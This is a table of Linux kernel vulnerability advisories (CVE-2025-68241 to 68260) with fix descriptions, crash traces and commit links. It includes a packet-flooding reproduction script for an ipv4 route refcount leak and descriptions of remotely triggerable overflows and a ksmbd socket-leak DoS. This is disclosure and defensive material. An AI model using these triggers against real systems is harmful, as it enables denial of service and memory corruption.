| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe The sit driver's packet transmission path calls: sit_tunnel_xmit() -> update_or_create_fnhe(), which leads to fnhe_remove_oldest() being called to delete entries exceeding FNHE_RECLAIM_DEPTH+random. The race window is between fnhe_remove_oldest() selecting fnheX for deletion and the subsequent kfree_rcu(). During this time, the concurrent path's __mkroute_output() -> find_exception() can fetch the soon-to-be-deleted fnheX, and rt_bind_exception() then binds it with a new dst using a dst_hold(). When the original fnheX is freed via RCU, the dst reference remains permanently leaked. CPU 0 CPU 1 __mkroute_output() find_exception() [fnheX] update_or_create_fnhe() fnhe_remove_oldest() [fnheX] rt_bind_exception() [bind dst] RCU callback [fnheX freed, dst leak] This issue manifests as a device reference count leak and a warning in dmesg when unregistering the net device: unregister_netdevice: waiting for sitX to become free. Usage count = N Ido Schimmel provided the simple test validation method [1]. The fix clears 'oldest->fnhe_daddr' before calling fnhe_flush_routes(). Since rt_bind_exception() checks this field, setting it to zero prevents the stale fnhe from being reused and bound to a new dst just before it is freed. [1] ip netns add ns1 ip -n ns1 link set dev lo up ip -n ns1 address add 192.0.2.1/32 dev lo ip -n ns1 link add name dummy1 up type dummy ip -n ns1 route add 192.0.2.2/32 dev dummy1 ip -n ns1 link add name gretap1 up arp off type gretap \ local 192.0.2.1 remote 192.0.2.2 ip -n ns1 route add 198.51.0.0/16 dev gretap1 taskset -c 0 ip netns exec ns1 mausezahn gretap1 \ -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q & taskset -c 2 ip netns exec ns1 mausezahn gretap1 \ -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q & sleep 10 ip netns pids ns1 | xargs kill ip netns del ns1 | 2025-12-16 | not yet calculated | CVE-2025-68241 | https://git.kernel.org/stable/c/69d35c12168f9c59b159ae566f77dfad9f96d7ca https://git.kernel.org/stable/c/4b7210da22429765d19460d38c30eeca72656282 https://git.kernel.org/stable/c/298f1e0694ab4edb6092d66efed93c4554e6ced1 https://git.kernel.org/stable/c/b8a44407bdaf2f0c5505cc7d9fc7d8da90cf9a94 https://git.kernel.org/stable/c/041ab9ca6e80d8f792bb69df28ebf1ef39c06af8 https://git.kernel.org/stable/c/b84f083f50ecc736a95091691339a1b363962f0e https://git.kernel.org/stable/c/0fd16ed6dc331636fb2a874c42d2f7d3156f7ff0 https://git.kernel.org/stable/c/ac1499fcd40fe06479e9b933347b837ccabc2a40 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFS: Fix LTP test failures when timestamps are delegated The utimes01 and utime06 tests fail when delegated timestamps are enabled, specifically in subtests that modify the atime and mtime fields using the 'nobody' user ID. The problem can be reproduced as follows: # echo "/media *(rw,no_root_squash,sync)" >> /etc/exports # export -ra # mount -o rw,nfsvers=4.2 127.0.0.1:/media /tmpdir # cd /opt/ltp # ./runltp -d /tmpdir -s utimes01 # ./runltp -d /tmpdir -s utime06 This issue occurs because nfs_setattr does not verify the inode's UID against the caller's fsuid when delegated timestamps are permitted for the inode. This patch adds the UID check, and if it does not match then the request is sent to the server for permission checking. | 2025-12-16 | not yet calculated | CVE-2025-68242 | https://git.kernel.org/stable/c/b2e4cda71ed062c87573b016d2d956a62f4258ed https://git.kernel.org/stable/c/0e9be902041c6b9f0ed4b72764187eed1067a42f https://git.kernel.org/stable/c/b623390045a81fc559decb9bfeb79319721d3dfb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFS: Check the TLS certificate fields in nfs_match_client() If the TLS security policy is of type RPC_XPRTSEC_TLS_X509, then the cert_serial and privkey_serial fields need to match as well since they define the client's identity, as presented to the server. | 2025-12-16 | not yet calculated | CVE-2025-68243 | https://git.kernel.org/stable/c/b8fa37219074811c04d4ecb742c73e2b296da6a8 https://git.kernel.org/stable/c/fb2cba0854a7f315c8100a807a6959b99d72479e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/i915: Avoid lock inversion when pinning to GGTT on CHV/BXT+VTD On completion of i915_vma_pin_ww(), a synchronous variant of dma_fence_work_commit() is called. When pinning a VMA to GGTT address space on a Cherry View family processor, or on a Broxton generation SoC with VTD enabled, i.e., when stop_machine() is then called from intel_ggtt_bind_vma(), that can potentially lead to lock inversion among reservation_ww and cpu_hotplug locks. [86.861179] ====================================================== [86.861193] WARNING: possible circular locking dependency detected [86.861209] 6.15.0-rc5-CI_DRM_16515-gca0305cadc2d+ #1 Tainted: G U [86.861226] ------------------------------------------------------ [86.861238] i915_module_loa/1432 is trying to acquire lock: [86.861252] ffffffff83489090 (cpu_hotplug_lock){++++}-{0:0}, at: stop_machine+0x1c/0x50 [86.861290] but task is already holding lock: [86.861303] ffffc90002e0b4c8 (reservation_ww_class_mutex){+.+.}-{3:3}, at: i915_vma_pin.constprop.0+0x39/0x1d0 [i915] [86.862233] which lock already depends on the new lock. [86.862251] the existing dependency chain (in reverse order) is: [86.862265] -> #5 (reservation_ww_class_mutex){+.+.}-{3:3}: [86.862292] dma_resv_lockdep+0x19a/0x390 [86.862315] do_one_initcall+0x60/0x3f0 [86.862334] kernel_init_freeable+0x3cd/0x680 [86.862353] kernel_init+0x1b/0x200 [86.862369] ret_from_fork+0x47/0x70 [86.862383] ret_from_fork_asm+0x1a/0x30 [86.862399] -> #4 (reservation_ww_class_acquire){+.+.}-{0:0}: [86.862425] dma_resv_lockdep+0x178/0x390 [86.862440] do_one_initcall+0x60/0x3f0 [86.862454] kernel_init_freeable+0x3cd/0x680 [86.862470] kernel_init+0x1b/0x200 [86.862482] ret_from_fork+0x47/0x70 [86.862495] ret_from_fork_asm+0x1a/0x30 [86.862509] -> #3 (&mm->mmap_lock){++++}-{3:3}: [86.862531] down_read_killable+0x46/0x1e0 [86.862546] lock_mm_and_find_vma+0xa2/0x280 [86.862561] do_user_addr_fault+0x266/0x8e0 [86.862578] exc_page_fault+0x8a/0x2f0 [86.862593] asm_exc_page_fault+0x27/0x30 [86.862607] filldir64+0xeb/0x180 [86.862620] kernfs_fop_readdir+0x118/0x480 [86.862635] iterate_dir+0xcf/0x2b0 [86.862648] __x64_sys_getdents64+0x84/0x140 [86.862661] x64_sys_call+0x1058/0x2660 [86.862675] do_syscall_64+0x91/0xe90 [86.862689] entry_SYSCALL_64_after_hwframe+0x76/0x7e [86.862703] -> #2 (&root->kernfs_rwsem){++++}-{3:3}: [86.862725] down_write+0x3e/0xf0 [86.862738] kernfs_add_one+0x30/0x3c0 [86.862751] kernfs_create_dir_ns+0x53/0xb0 [86.862765] internal_create_group+0x134/0x4c0 [86.862779] sysfs_create_group+0x13/0x20 [86.862792] topology_add_dev+0x1d/0x30 [86.862806] cpuhp_invoke_callback+0x4b5/0x850 [86.862822] cpuhp_issue_call+0xbf/0x1f0 [86.862836] __cpuhp_setup_state_cpuslocked+0x111/0x320 [86.862852] __cpuhp_setup_state+0xb0/0x220 [86.862866] topology_sysfs_init+0x30/0x50 [86.862879] do_one_initcall+0x60/0x3f0 [86.862893] kernel_init_freeable+0x3cd/0x680 [86.862908] kernel_init+0x1b/0x200 [86.862921] ret_from_fork+0x47/0x70 [86.862934] ret_from_fork_asm+0x1a/0x30 [86.862947] -> #1 (cpuhp_state_mutex){+.+.}-{3:3}: [86.862969] __mutex_lock+0xaa/0xed0 [86.862982] mutex_lock_nested+0x1b/0x30 [86.862995] __cpuhp_setup_state_cpuslocked+0x67/0x320 [86.863012] __cpuhp_setup_state+0xb0/0x220 [86.863026] page_alloc_init_cpuhp+0x2d/0x60 [86.863041] mm_core_init+0x22/0x2d0 [86.863054] start_kernel+0x576/0xbd0 [86.863068] x86_64_start_reservations+0x18/0x30 [86.863084] x86_64_start_kernel+0xbf/0x110 [86.863098] common_startup_64+0x13e/0x141 [86.863114] -> #0 (cpu_hotplug_lock){++++}-{0:0}: [86.863135] __lock_acquire+0x16 ---truncated--- | 2025-12-16 | not yet calculated | CVE-2025-68244 | https://git.kernel.org/stable/c/e988634d7aae7214818b9c86cd7ef9e78c84b02d https://git.kernel.org/stable/c/20d94a6117b752fd10a78cefdc1cf2c16706048b https://git.kernel.org/stable/c/3dec22bde207a36f1b8a4b80564cbbe13996a7cd https://git.kernel.org/stable/c/4e73066e3323add260e46eb51f79383d87950281 https://git.kernel.org/stable/c/858a50127be714f55c3bcb25621028d4a323d77e https://git.kernel.org/stable/c/84bbe327a5cbb060f3321c9d9d4d53936fc1ef9b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: netpoll: fix incorrect refcount handling causing incorrect cleanup commit efa95b01da18 ("netpoll: fix use after free") incorrectly ignored the refcount and prematurely set dev->npinfo to NULL during netpoll cleanup, leading to improper behavior and memory leaks. Scenario causing lack of proper cleanup: 1) A netpoll is associated with a NIC (e.g., eth0) and netdev->npinfo is allocated, and refcnt = 1 - Keep in mind that npinfo is shared among all netpoll instances. In this case, there is just one. 2) Another netpoll is also associated with the same NIC and npinfo->refcnt += 1. - Now dev->npinfo->refcnt = 2; - There is just one npinfo associated to the netdev. 3) When the first netpoll goes to clean up: - The first cleanup succeeds and clears np->dev->npinfo, ignoring refcnt. - It basically calls `RCU_INIT_POINTER(np->dev->npinfo, NULL);` - Sets dev->npinfo = NULL, without proper cleanup - No ->ndo_netpoll_cleanup() is called either 4) Now the second target tries to clean up - The second cleanup fails because np->dev->npinfo is already NULL. * In this case, ops->ndo_netpoll_cleanup() was never called, and the skb pool is not cleaned as well (for the second netpoll instance) - This leaks npinfo and skbpool skbs, which is clearly reported by kmemleak. Revert commit efa95b01da18 ("netpoll: fix use after free") and add clarifying comments emphasizing that npinfo cleanup should only happen once the refcount reaches zero, ensuring stable and correct netpoll behavior. | 2025-12-16 | not yet calculated | CVE-2025-68245 | https://git.kernel.org/stable/c/8e6a50edad11e3e1426e4c29e7aa6201f3468ac2 https://git.kernel.org/stable/c/9b0bb18b4b9dc017c1825a2c5e763615e34a1593 https://git.kernel.org/stable/c/890472d6fbf062e6de7fdd56642cb305ab79d669 https://git.kernel.org/stable/c/4afd4ebbad52aa146838ec23082ba393e426a2bb https://git.kernel.org/stable/c/c645693180a98606c430825223d2029315d85e9d https://git.kernel.org/stable/c/c79a6d9da29219616b118a3adce9a14cd30f9bd0 https://git.kernel.org/stable/c/9a51b5ccd1c79afec1c03a4e1e6688da52597556 https://git.kernel.org/stable/c/49c8d2c1f94cc2f4d1a108530d7ba52614b874c2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: close accepted socket when per-IP limit rejects connection When the per-IP connection limit is exceeded in ksmbd_kthread_fn(), the code sets ret = -EAGAIN and continues the accept loop without closing the just-accepted socket. That leaks one socket per rejected attempt from a single IP and enables a trivial remote DoS. Release client_sk before continuing. This bug was found with ZeroPath. | 2025-12-16 | not yet calculated | CVE-2025-68246 | https://git.kernel.org/stable/c/7a3c7154d5fc05956a8ad9e72ecf49e21555bfca https://git.kernel.org/stable/c/5746b2a0f5eb3d79667b3c51fe849bd62464220e https://git.kernel.org/stable/c/4587a7826be1ae0190dba10ff70b46bb0e3bc7d3 https://git.kernel.org/stable/c/35521b5a7e8a184548125f4530552101236dcda1 https://git.kernel.org/stable/c/98a5fd31cbf72d46bf18e50b3ab0ce86d5f319a9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: posix-timers: Plug potential memory leak in do_timer_create() When posix timer creation is set to allocate a given timer ID and the access to the user space value faults, the function terminates without freeing the already allocated posix timer structure. Move the allocation after the user space access to cure that. [ tglx: Massaged change log ] | 2025-12-16 | not yet calculated | CVE-2025-68247 | https://git.kernel.org/stable/c/f417f44524e7fc098e787c718d838b32723c0b2d https://git.kernel.org/stable/c/e0fd4d42e27f761e9cc82801b3f183e658dc749d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vmw_balloon: indicate success when effectively deflating during migration When migrating a balloon page, we first deflate the old page to then inflate the new page. However, if inflating the new page succeeded, we effectively deflated the old page, reducing the balloon size. In that case, the migration actually worked: similar to migrating+ immediately deflating the new page. The old page will be freed back to the buddy. Right now, the core will leave the page be marked as isolated (as we returned an error). When later trying to putback that page, we will run into the WARN_ON_ONCE() in balloon_page_putback(). That handling was changed in commit 3544c4faccb8 ("mm/balloon_compaction: stop using __ClearPageMovable()"); before that change, we would have tolerated that way of handling it. To fix it, let's just return 0 in that case, making the core effectively just clear the "isolated" flag + freeing it back to the buddy as if the migration succeeded. Note that the new page will also get freed when the core puts the last reference. Note that this also makes it all be more consistent: we will no longer unisolate the page in the balloon driver while keeping it marked as being isolated in migration core. This was found by code inspection. | 2025-12-16 | not yet calculated | CVE-2025-68248 | https://git.kernel.org/stable/c/aa05a044c5c2e147d726ac2fae1a97e0775eac11 https://git.kernel.org/stable/c/4ba5a8a7faa647ada8eae61a36517cf369f5bbe4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: most: usb: hdm_probe: Fix calling put_device() before device initialization The early error path in hdm_probe() can jump to err_free_mdev before &mdev->dev has been initialized with device_initialize(). Calling put_device(&mdev->dev) there triggers a device core WARN and ends up invoking kref_put(&kobj->kref, kobject_release) on an uninitialized kobject. In this path the private struct was only kmalloc'ed and the intended release is effectively kfree(mdev) anyway, so free it directly instead of calling put_device() on an uninitialized device. This removes the WARNING and fixes the pre-initialization error path. | 2025-12-16 | not yet calculated | CVE-2025-68249 | https://git.kernel.org/stable/c/3509c748e79435d09e730673c8c100b7f0ebc87c https://git.kernel.org/stable/c/ad2be44882716dc3589fbc5572cc13f88ead6b24 https://git.kernel.org/stable/c/c400410fe0580dd6118ae8d60287ac9ce71a65fd https://git.kernel.org/stable/c/6fb8fbc0aa542af5bf0fed94fa6b0edf18144f95 https://git.kernel.org/stable/c/7d851f746067b8ee5bac9c262f326ace0a6ea253 https://git.kernel.org/stable/c/4af0eedbdb4df7936bf43a28e31af232744d2620 https://git.kernel.org/stable/c/a8cc9e5fcb0e2eef21513a4fec888f5712cb8162 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hung_task: fix warnings caused by unaligned lock pointers The blocker tracking mechanism assumes that lock pointers are at least 4-byte aligned to use their lower bits for type encoding. However, as reported by Eero Tamminen, some architectures like m68k only guarantee 2-byte alignment of 32-bit values. This breaks the assumption and causes two related WARN_ON_ONCE checks to trigger. To fix this, the runtime checks are adjusted to silently ignore any lock that is not 4-byte aligned, effectively disabling the feature in such cases and avoiding the related warnings. Thanks to Geert Uytterhoeven for bisecting! | 2025-12-16 | not yet calculated | CVE-2025-68250 | https://git.kernel.org/stable/c/c0e2dcbe54cb15ecdf9d8f4501c6720423243888 https://git.kernel.org/stable/c/c97513cddcfc235f2522617980838e500af21d01 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: avoid infinite loops due to corrupted subpage compact indexes Robert reported an infinite loop observed by two crafted images. The root cause is that `clusterofs` can be larger than `lclustersize` for !NONHEAD `lclusters` in corrupted subpage compact indexes, e.g.: blocksize = lclustersize = 512 lcn = 6 clusterofs = 515 Move the corresponding check for full compress indexes to `z_erofs_load_lcluster_from_disk()` to also cover subpage compact compress indexes. It also fixes the position of `m->type >= Z_EROFS_LCLUSTER_TYPE_MAX` check, since it should be placed right after `z_erofs_load_{compact,full}_lcluster()`. | 2025-12-16 | not yet calculated | CVE-2025-68251 | https://git.kernel.org/stable/c/8675447a8794983f2b7e694b378112772c17635e https://git.kernel.org/stable/c/e13d315ae077bb7c3c6027cc292401bc0f4ec683 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: misc: fastrpc: Fix dma_buf object leak in fastrpc_map_lookup In fastrpc_map_lookup, dma_buf_get is called to obtain a reference to the dma_buf for comparison purposes. However, this reference is never released when the function returns, leading to a dma_buf memory leak. Fix this by adding dma_buf_put before returning from the function, ensuring that the temporarily acquired reference is properly released regardless of whether a matching map is found. Rule: add | 2025-12-16 | not yet calculated | CVE-2025-68252 | https://git.kernel.org/stable/c/c2fef5ebb73f3dabae6fbc571d181914ed32c483 https://git.kernel.org/stable/c/9a297a68c3ba4a7ecb31ed52f61bd6634abb79d3 https://git.kernel.org/stable/c/e17b13387827adce7acb19ac0f07f9bcafe0ff4c https://git.kernel.org/stable/c/214e81a63a9aa0be42382ef0365ba5ed32c513ab https://git.kernel.org/stable/c/fff111bf45cbeeb659324316d68554e35d350092 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm: don't spin in add_stack_record when gfp flags don't allow syzbot was able to find the following path: add_stack_record_to_list mm/page_owner.c:182 [inline] inc_stack_record_count mm/page_owner.c:214 [inline] __set_page_owner+0x2c3/0x4a0 mm/page_owner.c:333 set_page_owner include/linux/page_owner.h:32 [inline] post_alloc_hook+0x240/0x2a0 mm/page_alloc.c:1851 prep_new_page mm/page_alloc.c:1859 [inline] get_page_from_freelist+0x21e4/0x22c0 mm/page_alloc.c:3858 alloc_pages_nolock_noprof+0x94/0x120 mm/page_alloc.c:7554 Don't spin in add_stack_record_to_list() when it is called from *_nolock() context. | 2025-12-16 | not yet calculated | CVE-2025-68253 | https://git.kernel.org/stable/c/504174133453e3af73e626e328603d7eb5986f34 https://git.kernel.org/stable/c/c83aab85e18103a6dc066b4939e2c92a02bb1b05 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8723bs: fix out-of-bounds read in OnBeacon ESR IE parsing The Extended Supported Rates (ESR) IE handling in OnBeacon accessed *(p + 1 + ielen) and *(p + 2 + ielen) without verifying that these offsets lie within the received frame buffer. A malformed beacon with an ESR IE positioned at the end of the buffer could cause an out-of-bounds read, potentially triggering a kernel panic. Add a boundary check to ensure that the ESR IE body and the subsequent bytes are within the limits of the frame before attempting to access them. This prevents OOB reads caused by malformed beacon frames. | 2025-12-16 | not yet calculated | CVE-2025-68254 | https://git.kernel.org/stable/c/d1ab7f9cee22e7b8a528da9ac953e4193b96cda5 https://git.kernel.org/stable/c/38292407c2bb5b2b3131aaace4ecc7a829b40b76 https://git.kernel.org/stable/c/bf323db1d883c209880bd92f3b12503e3531c3fc https://git.kernel.org/stable/c/502ddcc405b69fa92e0add6c1714d654504f6fd7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8723bs: fix stack buffer overflow in OnAssocReq IE parsing The Supported Rates IE length from an incoming Association Request frame was used directly as the memcpy() length when copying into a fixed-size 16-byte stack buffer (supportRate). A malicious station can advertise an IE length larger than 16 bytes, causing a stack buffer overflow. Clamp ie_len to the buffer size before copying the Supported Rates IE, and correct the bounds check when merging Extended Supported Rates to prevent a second potential overflow. This prevents kernel stack corruption triggered by malformed association requests. | 2025-12-16 | not yet calculated | CVE-2025-68255 | https://git.kernel.org/stable/c/61871c83259a511980ec2664964cecc69005398b https://git.kernel.org/stable/c/25411f5fcf5743131158f337c99c2bbf3f8477f5 https://git.kernel.org/stable/c/e841d8ea722315b781c4fc5bf4f7670fbca88875 https://git.kernel.org/stable/c/6ef0e1c10455927867cac8f0ed6b49f328f8cf95 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8723bs: fix out-of-bounds read in rtw_get_ie() parser The Information Element (IE) parser rtw_get_ie() trusted the length byte of each IE without validating that the IE body (len bytes after the 2-byte header) fits inside the remaining frame buffer. A malformed frame can advertise an IE length larger than the available data, causing the parser to increment its pointer beyond the buffer end. This results in out-of-bounds reads or, depending on the pattern, an infinite loop. Fix by validating that (offset + 2 + len) does not exceed the limit before accepting the IE or advancing to the next element. This prevents OOB reads and ensures the parser terminates safely on malformed frames. | 2025-12-16 | not yet calculated | CVE-2025-68256 | https://git.kernel.org/stable/c/a54e2b2db1b7de2e008b4f62eec35aaefcc663c5 https://git.kernel.org/stable/c/df191dd9f4c7249d98ada55634fa8ac19089b8cb https://git.kernel.org/stable/c/c0d93d69e1472ba75b78898979b90a98ba2a2501 https://git.kernel.org/stable/c/154828bf9559b9c8421fc2f0d7f7f76b3683aaed |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: comedi: check device's attached status in compat ioctls Syzbot identified an issue [1] that crashes the kernel, seemingly due to a nonexistent callback dev->get_valid_routes(). By all means, this should not occur as said callback must always be set to get_zero_valid_routes() in __comedi_device_postconfig(). As the crash seems to appear exclusively in i386 kernels, at least judging from [1] reports, the blame lies with compat versions of standard IOCTL handlers. Several of them are modified and do not use comedi_unlocked_ioctl(). While the functionality of these ioctls essentially copies their original versions, they do not have the required sanity check for the device's attached status. This, in turn, leads to a possibility of calling select IOCTLs on a device that has not been properly set up, even via COMEDI_DEVCONFIG. Doing so on unconfigured devices means that several crucial steps are missed, for instance, specifying the dev->get_valid_routes() callback. Fix this somewhat crudely by ensuring the device's attached status before performing any ioctls, improving logic consistency between modern and compat functions. [1] Syzbot report: BUG: kernel NULL pointer dereference, address: 0000000000000000 ... CR2: ffffffffffffffd6 CR3: 000000006c717000 CR4: 0000000000352ef0 Call Trace: <TASK> get_valid_routes drivers/comedi/comedi_fops.c:1322 [inline] parse_insn+0x78c/0x1970 drivers/comedi/comedi_fops.c:1401 do_insnlist_ioctl+0x272/0x700 drivers/comedi/comedi_fops.c:1594 compat_insnlist drivers/comedi/comedi_fops.c:3208 [inline] comedi_compat_ioctl+0x810/0x990 drivers/comedi/comedi_fops.c:3273 __do_compat_sys_ioctl fs/ioctl.c:695 [inline] __se_compat_sys_ioctl fs/ioctl.c:638 [inline] __ia32_compat_sys_ioctl+0x242/0x370 fs/ioctl.c:638 do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline] ... | 2025-12-16 | not yet calculated | CVE-2025-68257 | https://git.kernel.org/stable/c/f6e629dfe6f590091c662a87c9fcf118b1c1c7dc https://git.kernel.org/stable/c/573b07d2e3d473ee7eb625ef87519922cf01168d https://git.kernel.org/stable/c/aac80e912de306815297a3b74f0426873ffa7dc3 https://git.kernel.org/stable/c/0de7d9cd07a2671fa6089173bccc0b2afe6b93ee |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: comedi: multiq3: sanitize config options in multiq3_attach() Syzbot identified an issue [1] in multiq3_attach() that induces a task timeout due to open() or COMEDI_DEVCONFIG ioctl operations, specifically, in the case of multiq3 driver. This problem arose when syzkaller managed to craft weird configuration options used to specify the number of channels in encoder subdevice. If a particularly great number is passed to s->n_chan in multiq3_attach() via it->options[2], then multiple calls to multiq3_encoder_reset() at the end of driver-specific attach() method will be running for minutes, thus blocking tasks and affected devices as well. While this issue is most likely not too dangerous for real-life devices, it still makes sense to sanitize configuration inputs. Enable a sensible limit on the number of encoder chips (4 chips max, each with 2 channels) to stop this behaviour from manifesting. [1] Syzbot crash: INFO: task syz.2.19:6067 blocked for more than 143 seconds. ... Call Trace: <TASK> context_switch kernel/sched/core.c:5254 [inline] __schedule+0x17c4/0x4d60 kernel/sched/core.c:6862 __schedule_loop kernel/sched/core.c:6944 [inline] schedule+0x165/0x360 kernel/sched/core.c:6959 schedule_preempt_disabled+0x13/0x30 kernel/sched/core.c:7016 __mutex_lock_common kernel/locking/mutex.c:676 [inline] __mutex_lock+0x7e6/0x1350 kernel/locking/mutex.c:760 comedi_open+0xc0/0x590 drivers/comedi/comedi_fops.c:2868 chrdev_open+0x4cc/0x5e0 fs/char_dev.c:414 do_dentry_open+0x953/0x13f0 fs/open.c:965 vfs_open+0x3b/0x340 fs/open.c:1097 ... | 2025-12-16 | not yet calculated | CVE-2025-68258 | https://git.kernel.org/stable/c/8952bc1973cd54158c35e06bfb8c29ace7375a48 https://git.kernel.org/stable/c/8dc2f02d3bada9247f00bfd2e5f61f68c389a0a3 https://git.kernel.org/stable/c/543f4c380c2e1f35e60528df7cb54705cda7fee3 https://git.kernel.org/stable/c/f24c6e3a39fa355dabfb684c9ca82db579534e72 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: SVM: Don't skip unrelated instruction if INT3/INTO is replaced When re-injecting a soft interrupt from an INT3, INT0, or (select) INTn instruction, discard the exception and retry the instruction if the code stream is changed (e.g. by a different vCPU) between when the CPU executes the instruction and when KVM decodes the instruction to get the next RIP. As effectively predicted by commit 6ef88d6e36c2 ("KVM: SVM: Re-inject INT3/INTO instead of retrying the instruction"), failure to verify that the correct INTn instruction was decoded can effectively clobber guest state due to decoding the wrong instruction and thus specifying the wrong next RIP. The bug most often manifests as "Oops: int3" panics on static branch checks in Linux guests. Enabling or disabling a static branch in Linux uses the kernel's "text poke" code patching mechanism. To modify code while other CPUs may be executing that code, Linux (temporarily) replaces the first byte of the original instruction with an int3 (opcode 0xcc), then patches in the new code stream except for the first byte, and finally replaces the int3 with the first byte of the new code stream. If a CPU hits the int3, i.e. executes the code while it's being modified, then the guest kernel must look up the RIP to determine how to handle the #BP, e.g. by emulating the new instruction. If the RIP is incorrect, then this lookup fails and the guest kernel panics. The bug reproduces almost instantly by hacking the guest kernel to repeatedly check a static branch[1] while running a drgn script[2] on the host to constantly swap out the memory containing the guest's TSS. [1]: https://gist.github.com/osandov/44d17c51c28c0ac998ea0334edf90b5a [2]: https://gist.github.com/osandov/10e45e45afa29b11e0c7209247afc00b | 2025-12-16 | not yet calculated | CVE-2025-68259 | https://git.kernel.org/stable/c/87cc1622c88a4888959d64fa1fc9ba1e264aa3d4 https://git.kernel.org/stable/c/54bcccc2c7805a00af1d7d2faffd6f424c0133aa https://git.kernel.org/stable/c/53903ac9ca1abffa27327e85075ec496fa55ccf3 https://git.kernel.org/stable/c/4da3768e1820cf15cced390242d8789aed34f54d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rust_binder: fix race condition on death_list Rust Binder contains the following unsafe operation: // SAFETY: A `NodeDeath` is never inserted into the death list // of any node other than its owner, so it is either in this // death list or in no death list. unsafe { node_inner.death_list.remove(self) }; This operation is unsafe because when touching the prev/next pointers of a list element, we have to ensure that no other thread is also touching them in parallel. If the node is present in the list that `remove` is called on, then that is fine because we have exclusive access to that list. If the node is not in any list, then it's also ok. But if it's present in a different list that may be accessed in parallel, then that may be a data race on the prev/next pointers. And unfortunately that is exactly what is happening here. In Node::release, we: 1. Take the lock. 2. Move all items to a local list on the stack. 3. Drop the lock. 4. Iterate the local list on the stack. Combined with threads using the unsafe remove method on the original list, this leads to memory corruption of the prev/next pointers. This leads to crashes like this one: Unable to handle kernel paging request at virtual address 000bb9841bcac70e Mem abort info: ESR = 0x0000000096000044 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x04: level 0 translation fault Data abort info: ISV = 0, ISS = 0x00000044, ISS2 = 0x00000000 CM = 0, WnR = 1, TnD = 0, TagAccess = 0 GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [000bb9841bcac70e] address between user and kernel address ranges Internal error: Oops: 0000000096000044 [#1] PREEMPT SMP google-cdd 538c004.gcdd: context saved(CPU:1) item - log_kevents is disabled Modules linked in: ... rust_binder CPU: 1 UID: 0 PID: 2092 Comm: kworker/1:178 Tainted: G S W OE 6.12.52-android16-5-g98debd5df505-4k #1 f94a6367396c5488d635708e43ee0c888d230b0b Tainted: [S]=CPU_OUT_OF_SPEC, [W]=WARN, [O]=OOT_MODULE, [E]=UNSIGNED_MODULE Hardware name: MUSTANG PVT 1.0 based on LGA (DT) Workqueue: events _RNvXs6_NtCsdfZWD8DztAw_6kernel9workqueueINtNtNtB7_4sync3arc3ArcNtNtCs8QPsHWIn21X_16rust_binder_main7process7ProcessEINtB5_15WorkItemPointerKy0_E3runB13_ [rust_binder] pstate: 23400005 (nzCv daif +PAN -UAO +TCO +DIT -SSBS BTYPE=--) pc : _RNvXs3_NtCs8QPsHWIn21X_16rust_binder_main7processNtB5_7ProcessNtNtCsdfZWD8DztAw_6kernel9workqueue8WorkItem3run+0x450/0x11f8 [rust_binder] lr : _RNvXs3_NtCs8QPsHWIn21X_16rust_binder_main7processNtB5_7ProcessNtNtCsdfZWD8DztAw_6kernel9workqueue8WorkItem3run+0x464/0x11f8 [rust_binder] sp : ffffffc09b433ac0 x29: ffffffc09b433d30 x28: ffffff8821690000 x27: ffffffd40cbaa448 x26: ffffff8821690000 x25: 00000000ffffffff x24: ffffff88d0376578 x23: 0000000000000001 x22: ffffffc09b433c78 x21: ffffff88e8f9bf40 x20: ffffff88e8f9bf40 x19: ffffff882692b000 x18: ffffffd40f10bf00 x17: 00000000c006287d x16: 00000000c006287d x15: 00000000000003b0 x14: 0000000000000100 x13: 000000201cb79ae0 x12: fffffffffffffff0 x11: 0000000000000000 x10: 0000000000000001 x9 : 0000000000000000 x8 : b80bb9841bcac706 x7 : 0000000000000001 x6 : fffffffebee63f30 x5 : 0000000000000000 x4 : 0000000000000001 x3 : 0000000000000000 x2 : 0000000000004c31 x1 : ffffff88216900c0 x0 : ffffff88e8f9bf00 Call trace: _RNvXs3_NtCs8QPsHWIn21X_16rust_binder_main7processNtB5_7ProcessNtNtCsdfZWD8DztAw_6kernel9workqueue8WorkItem3run+0x450/0x11f8 [rust_binder bbc172b53665bbc815363b22e97e3f7e3fe971fc] process_scheduled_works+0x1c4/0x45c worker_thread+0x32c/0x3e8 kthread+0x11c/0x1c8 ret_from_fork+0x10/0x20 Code: 94218d85 b4000155 a94026a8 d10102a0 (f9000509) ---[ end trace 0000000000000000 ]--- Thus, modify Node::release to pop items directly off the original list. | 2025-12-16 | not yet calculated | CVE-2025-68260 | https://git.kernel.org/stable/c/3428831264096d32f830a7fcfc7885dd263e511a https://git.kernel.org/stable/c/3e0ae02ba831da2b707905f4e602e43f8507b8cc |
